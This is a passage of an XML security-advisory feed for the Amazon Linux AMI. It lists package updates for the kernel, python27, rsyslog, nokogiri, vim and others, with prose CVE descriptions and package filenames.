date="2022-05-31 23:47:00" /><updated date="2025-05-21 21:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4459:
A NULL pointer dereference flaw was found in vmxnet3_rq_cleanup in drivers/net/vmxnet3/vmxnet3_drv.c in the networking sub-component in vmxnet3 in the Linux Kernel. This issue may allow a local attacker with normal user privilege to cause a denial of service due to a missing sanity check during cleanup.
CVE-2023-4387:
A use-after-free flaw was found in vmxnet3_rq_alloc_rx_buf in drivers/net/vmxnet3/vmxnet3_drv.c in VMware's vmxnet3 ethernet NIC driver in the Linux Kernel. This issue could allow a local attacker to crash the system due to a double-free while cleaning up vmxnet3_rq_cleanup_all, which could also lead to a kernel information leak problem.
CVE-2023-1637:
A flaw that boot CPU could be vulnerable for the speculative execution behavior kind of attacks in the Linux kernel X86 CPU Power management options functionality was found in the way user resuming CPU from suspend-to-RAM. A local user could use this flaw to potentially get unauthorized access to some memory of the CPU similar to the speculative execution behavior kind of attacks.
CVE-2022-49287:
In the Linux kernel, the following vulnerability has been resolved:
tpm: fix reference counting for struct tpm_chip
CVE-2022-49114:
In the Linux kernel, the following vulnerability has been resolved:
scsi: libfc: Fix use after free in fc_exch_abts_resp()
CVE-2022-49085:
In the Linux kernel, the following vulnerability has been resolved:
drbd: Fix five use after free bugs in get_initial_state
CVE-2022-49058:
In the Linux kernel, the following vulnerability has been resolved:
cifs: potential buffer overflow in handling symlinks
CVE-2022-41858:
A flaw was found in the Linux kernel. A NULL pointer dereference may occur while a slip driver is in progress to detach in sl_tx_timeout in drivers/net/slip/slip.c. This issue could allow an attacker to crash the system or leak internal kernel information.
CVE-2022-30594:
The Linux kernel before 5.17.2 mishandles seccomp permissions. The PTRACE_SEIZE code path allows attackers to bypass intended restrictions on setting the PT_SUSPEND_SECCOMP flag.
CVE-2022-2977:
A flaw was found in the Linux kernel implementation of proxied virtualized TPM devices. On a system where virtualized TPM devices are configured (this is not the default) a local attacker can create a use-after-free and create a situation where it may be possible to escalate privileges on the system.
CVE-2022-29581:
Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions.
CVE-2022-28390:
A double-free flaw was found in the Linux kernel in the ems_usb_start_xmit function. This flaw allows an attacker to create a memory leak and corrupt the underlying data structure by calling free more than once.
CVE-2022-28389:
mcba_usb_start_xmit in drivers/net/can/usb/mcba_usb.c in the Linux kernel through 5.17.1 has a double free.
CVE-2022-2639:
An integer coercion error was found in the openvswitch kernel module. Given a sufficiently large number of actions, while copying and reserving memory for a new action of a new flow, the reserve_sfa_size() function does not return -EMSGSIZE as expected, potentially leading to an out-of-bounds write access. This flaw allows a local user to crash or potentially escalate their privileges on the system.
CVE-2022-1729:
perf: Fix sys_perf_event_open() race against self
CVE-2022-1516:
A NULL pointer dereference flaw was found in the Linux kernel's X.25 set of standardized network protocols functionality in the way a user terminates their session using a simulated Ethernet card and continued usage of this connection. This flaw allows a local user to crash the system.
CVE-2022-1353:
A vulnerability was found in the pfkey_register function in net/key/af_key.c in the Linux kernel. This flaw allows a local, unprivileged user to gain access to kernel memory, leading to a system crash or a leak of internal kernel information.
CVE-2022-1011:
A use-after-free flaw was found in the Linux kernel's FUSE filesystem in the way a user triggers write(). This flaw allows a local user to gain unauthorized access to data from the FUSE filesystem, resulting in privilege escalation.
CVE-2022-0854:
A memory leak flaw was found in the Linux kernel's DMA subsystem, in the way a user calls DMA_FROM_DEVICE. This flaw allows a local user to read random memory from the kernel space.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0854" title="" id="CVE-2022-0854" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1011" title="" id="CVE-2022-1011" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1353" title="" id="CVE-2022-1353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1516" title="" id="CVE-2022-1516" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1729" title="" id="CVE-2022-1729" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2639" title="" id="CVE-2022-2639" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28389" title="" id="CVE-2022-28389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28390" title="" id="CVE-2022-28390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29581" title="" id="CVE-2022-29581" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2977" title="" id="CVE-2022-2977" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30594" title="" id="CVE-2022-30594" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41858" title="" id="CVE-2022-41858" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49058" title="" id="CVE-2022-49058" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49085" title="" id="CVE-2022-49085" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49114" title="" id="CVE-2022-49114" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49287" title="" id="CVE-2022-49287" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1637" title="" id="CVE-2023-1637" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4387" title="" id="CVE-2023-4387" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4459" title="" id="CVE-2023-4459" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.281-144.502.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1592</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1592: important priority package update for python-twisted-conch</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-21716:
An uncontrolled resource consumption flaw was found in python-twisted in the dataReceived() function. This flaw allows an unauthenticated, remote attacker to send a simple command to use all available memory and crash the server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21716" title="" id="CVE-2022-21716" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-twisted-conch" version="8.2.0" release="3.2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-twisted-conch-8.2.0-3.2.7.amzn1.x86_64.rpm</filename></package><package name="python26-twisted-conch" version="8.2.0" release="3.2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-twisted-conch-8.2.0-3.2.7.amzn1.x86_64.rpm</filename></package><package name="python26-twisted-conch" version="8.2.0" release="3.2.7.amzn1" epoch="0" arch="i686"><filename>Packages/python26-twisted-conch-8.2.0-3.2.7.amzn1.i686.rpm</filename></package><package name="python27-twisted-conch" version="8.2.0" release="3.2.7.amzn1" epoch="0" arch="i686"><filename>Packages/python27-twisted-conch-8.2.0-3.2.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1593</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1593: medium priority package update for python27</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0391:
A flaw was found in Python, specifically within the urllib.parse module. This module helps break Uniform Resource Locator (URL) strings into components. The issue involves how the urlparse method does not sanitize input and allows characters like r and n in the URL path. This flaw allows an attacker to input a crafted URL, leading to injection attacks.
CVE-2021-4189:
ftplib should not use the host from the PASV response
CVE-2021-3737:
A flaw was found in python. An improperly handled HTTP response in the HTTP client code of python may allow a remote attacker, who controls the HTTP server, to make the client script enter an infinite loop, consuming CPU time. The highest threat from this vulnerability is to system availability.
CVE-2021-3733:
There's a flaw in urllib's AbstractBasicAuthHandler class. An attacker who controls a malicious HTTP server that an HTTP client (such as web browser) connects to, could trigger a Regular Expression Denial of Service (ReDOS) during an authentication request with a specially crafted payload that is sent by the server to the client. The greatest threat that this flaw poses is to application availability.
CVE-2021-23336:
The package python/cpython is vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter.
CVE-2020-27619:
In Python3's Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27619" title="" id="CVE-2020-27619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336" title="" id="CVE-2021-23336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3733" title="" id="CVE-2021-3733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3737" title="" id="CVE-2021-3737" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4189" title="" id="CVE-2021-4189" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0391" title="" id="CVE-2022-0391" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.142.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.142.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.142.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.142.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.142.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.142.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1594</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1594: important priority package update for rsyslog</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24903:
A flaw was found in rsyslog's reception TCP modules. This flaw allows an attacker to craft a malicious message leading to a heap-based buffer overflow. This issue allows the attacker to corrupt or access data stored in memory, leading to a denial of service in the rsyslog or possible remote code execution.
CVE-2014-3634:
A flaw was found in the way rsyslog handled invalid log message priority values. In certain configurations, a local attacker, or a remote attacker able to connect to the rsyslog port, could use this flaw to crash the rsyslog daemon or, potentially in rsyslog 7.x, execute arbitrary code as the user running the rsyslog daemon.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3634" title="" id="CVE-2014-3634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24903" title="" id="CVE-2022-24903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rsyslog-pgsql" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-pgsql-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-mysql-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gnutls-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-debuginfo-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-snmp-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gssapi" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gssapi-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-mysql-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-snmp-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog-pgsql" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-pgsql-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gnutls-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog-gssapi" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gssapi-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-debuginfo-5.8.10-9.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1595</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1595: important priority package update for rubygem-nokogiri rubygem18-nokogiri</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24836:
Nokogiri is an open source XML and HTML library for Ruby. Nokogiri `< v1.13.4` contains an inefficient regular expression that is susceptible to excessive backtracking when attempting to detect encoding in HTML documents. Users are advised to upgrade to Nokogiri `>= 1.13.4`. There are no known workarounds for this issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24836" title="" id="CVE-2022-24836" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem20-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-nokogiri-doc-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem22-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-nokogiri-doc-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-nokogiri-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem-nokogiri-debuginfo" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem-nokogiri-debuginfo-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem20-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-nokogiri-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-nokogiri-doc-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem22-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-nokogiri-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-nokogiri-doc-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem22-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-nokogiri-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem-nokogiri-debuginfo" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem-nokogiri-debuginfo-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem20-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-nokogiri-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem21-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-nokogiri-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem22-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-nokogiri-doc-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem20-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-nokogiri-doc-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem18-nokogiri-doc" version="1.5.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem18-nokogiri-doc-1.5.11-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygem18-nokogiri" version="1.5.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem18-nokogiri-1.5.11-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygem18-nokogiri-debuginfo" version="1.5.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem18-nokogiri-debuginfo-1.5.11-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygem18-nokogiri" version="1.5.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem18-nokogiri-1.5.11-1.16.amzn1.i686.rpm</filename></package><package name="rubygem18-nokogiri-debuginfo" version="1.5.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem18-nokogiri-debuginfo-1.5.11-1.16.amzn1.i686.rpm</filename></package><package name="rubygem18-nokogiri-doc" version="1.5.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem18-nokogiri-doc-1.5.11-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1597</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1597: important priority package update for vim</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1420:
A vulnerability was found in Vim. The issue occurs when using a number in a string for the lambda name, triggering an out-of-range pointer offset vulnerability. This flaw allows an attacker to trick a user into opening a crafted script containing an argument as a number and then using it as a string pointer to access any memory location, causing an application to crash and possibly access some memory.
CVE-2022-1381:
A global heap buffer overflow vulnerability was found in vim's skip_range() function of the src/ex_docmd.c file. This flaw occurs because vim uses an invalid pointer with V: in Ex mode. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap buffer overflow that causes an application to crash, leading to a denial of service.
CVE-2022-1160:
A heap buffer overflow flaw was found in vim's get_one_sourceline() function of scriptfile.c file. This flaw occurs when source can read past the end of the copied line. This flaw allows an attacker to trick a user into opening a crafted file, triggering a heap-overflow and causing an application to crash, which leads to a denial of service.
CVE-2022-1154:
A heap use-after-free vulnerability was found in Vim's utf_ptr2char() function of the src/mbyte.c file. This flaw occurs because vim is using a buffer line after it has been freed in the old regexp engine. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap use-after-free that causes an application to crash, possibly executing code and corrupting memory.
CVE-2022-0943:
A heap buffer overflow flaw was found in vim's suggest_try_change() function of the spellsuggest.c file. This flaw allows an attacker to trick a user into opening a crafted file, triggering a heap-overflow and causing an application to crash, which leads to a denial of service.
CVE-2022-0572:
A heap-based buffer overflow flaw was found in vim's ex_retab() function of indent.c file. This flaw occurs when repeatedly using :retab. This flaw allows an attacker to trick a user into opening a crafted file triggering a heap-overflow.
CVE-2022-0413:
A flaw was found in vim. The vulnerability occurs due to using freed memory when the substitute uses a recursive function call, resulting in a use-after-free vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0392:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
CVE-2022-0361:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
CVE-2022-0359:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access with large tabstop in Ex mode, which can lead to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0318:
A flaw was found in vim. The vulnerability occurs due to reading beyond the end of a line in the utf_head_off function, which can lead to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0261:
A heap based out-of-bounds write flaw was found in vim's ops.c. This flaw allows an attacker to trick a user to open a crafted file triggering an out-of-bounds write. This vulnerability is capable of crashing software, modify memory, and possible code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0261" title="" id="CVE-2022-0261" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0318" title="" id="CVE-2022-0318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0359" title="" id="CVE-2022-0359" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0361" title="" id="CVE-2022-0361" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0392" title="" id="CVE-2022-0392" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0413" title="" id="CVE-2022-0413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0572" title="" id="CVE-2022-0572" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0943" title="" id="CVE-2022-0943" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1154" title="" id="CVE-2022-1154" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1160" title="" id="CVE-2022-1160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1381" title="" id="CVE-2022-1381" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1420" title="" id="CVE-2022-1420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-filesystem" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-8.2.4877-1.1.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.2.4877-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.2.4877-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.2.4877-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-8.2.4877-1.1.amzn1.noarch.rpm</filename></package><package name="vim-common" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.2.4877-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.2.4877-1.1.amzn1.i686.rpm</filename></package><package 